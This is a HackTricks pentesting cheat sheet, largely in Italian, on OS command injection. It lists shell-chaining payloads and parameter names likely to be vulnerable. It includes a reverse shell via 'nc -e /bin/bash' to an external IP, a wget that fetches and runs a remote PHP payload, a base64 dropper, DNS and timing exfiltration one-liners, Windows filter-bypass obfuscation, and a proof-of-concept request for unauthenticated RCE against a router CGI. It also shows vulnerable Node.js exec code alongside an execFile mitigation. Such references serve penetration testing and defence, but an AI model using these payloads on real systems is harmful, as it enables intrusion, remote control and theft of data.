HackTricksCommand Injection
Reading time: 7 minutes
tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: 
HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure: 
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.
What is command Injection?
Una command injection permette l'esecuzione di comandi arbitrari del sistema operativo da parte di un attaccante sul server che ospita un'applicazione. Di conseguenza, l'applicazione e tutti i suoi dati possono essere completamente compromessi. L'esecuzione di questi comandi tipicamente consente all'attaccante di ottenere accesso non autorizzato o controllo sull'ambiente dell'applicazione e sul sistema sottostante.
Contesto
A seconda di dove viene iniettato il tuo input potresti dover terminare il contesto tra virgolette (usando " o ') prima dei comandi.
Command Injection/Execution
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a # (Combining new lines and tabs)
#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful
#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
Limition Bypasses
Se stai cercando di eseguire comandi arbitrari all'interno di una macchina linux, ti interesserà leggere questi Bypasses:
Esempi
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
Parametri
Ecco i primi 25 parametri che potrebbero essere vulnerabili a code injection e a simili vulnerabilità RCE (da link):
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}
Esfiltrazione di dati basata sul tempo
Estrazione dei dati: carattere per carattere
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s
DNS based data exfiltration
Basato sullo strumento presente su https://github.com/HoLyVieR/dnsbin, anche ospitato su dnsbin.zhack.ca
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
Strumenti online per verificare DNS based data exfiltration:
- dnsbin.zhack.ca
- pingb.in
Filtering bypass
Windows
powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc
Linux
Node.js child_process.exec vs execFile
Durante l'audit dei back-end JavaScript/TypeScript ti imbatterai spesso nell'API Node.js child_process.
// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});
exec() avvia una shell (/bin/sh -c), quindi qualsiasi carattere che abbia un significato speciale per la shell (back-ticks, ;, &&, |, $(), …) porterà a command injection quando l'input dell'utente viene concatenato nella stringa.
Mitigazione: usa execFile() (o spawn() senza l'opzione shell) e fornisci ogni argomento come elemento separato dell'array in modo che non venga coinvolta alcuna shell:
const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);
Caso reale: Synology Photos ≤ 1.7.0-0794 era sfruttabile tramite un evento WebSocket non autenticato che inseriva dati controllati dall'attaccante in id_user, poi incorporati in una chiamata exec(), ottenendo RCE (Pwn2Own Ireland 2024).
Argument/Option injection via leading hyphen (argv, no shell metacharacters)
Non tutte le injection richiedono metacaratteri di shell. Se l'applicazione passa stringhe non fidate come argomenti a un utility di sistema (anche con execve/execFile e senza shell), molti programmi interpreteranno comunque qualsiasi argomento che comincia con - o -- come un'opzione. Questo permette a un attaccante di cambiare modalità, modificare i percorsi di output o attivare comportamenti pericolosi senza mai ottenere l'accesso a una shell.
Luoghi tipici in cui questo appare:
- Interfacce web integrate/handler CGI che costruiscono comandi come
ping <user>,tcpdump -i <iface> -w <file>,curl <url>, ecc. - Router CGI centralizzati (es.,
/cgi-bin/<something>.cgicon un parametro selettore cometopicurl=<handler>) dove più handler riutilizzano lo stesso validatore debole.
Cosa provare:
- Fornire valori che iniziano con
-/--per essere interpretati come flag dall'utility a valle. - Abusare di flag che cambiano comportamento o scrivono file, per esempio:
ping:-f/-c 100000per sovraccaricare il dispositivo (DoS)curl:-o /tmp/xper scrivere percorsi arbitrari,-K <url>per caricare una config controllata dall'attaccantetcpdump:-G 1 -W 1 -z /path/script.shper ottenere esecuzione post-rotazione in wrapper non sicuri
- Se il programma supporta
--end-of-options, provare a bypassare mitigazioni ingenue che antepongono--nel posto sbagliato.
Generic PoC shapes against centralized CGI dispatchers:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
# Flip options in a downstream tool via argv injection
topicurl=<handler>¶m=-n
# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;
Elenco di rilevamento Brute-Force
Riferimenti
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
- https://portswigger.net/web-security/os-command-injection
- Estrazione degli archivi criptati Synology – Synacktiv 2025
- Manuale PHP proc_open
- HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)
- Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered
tip
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.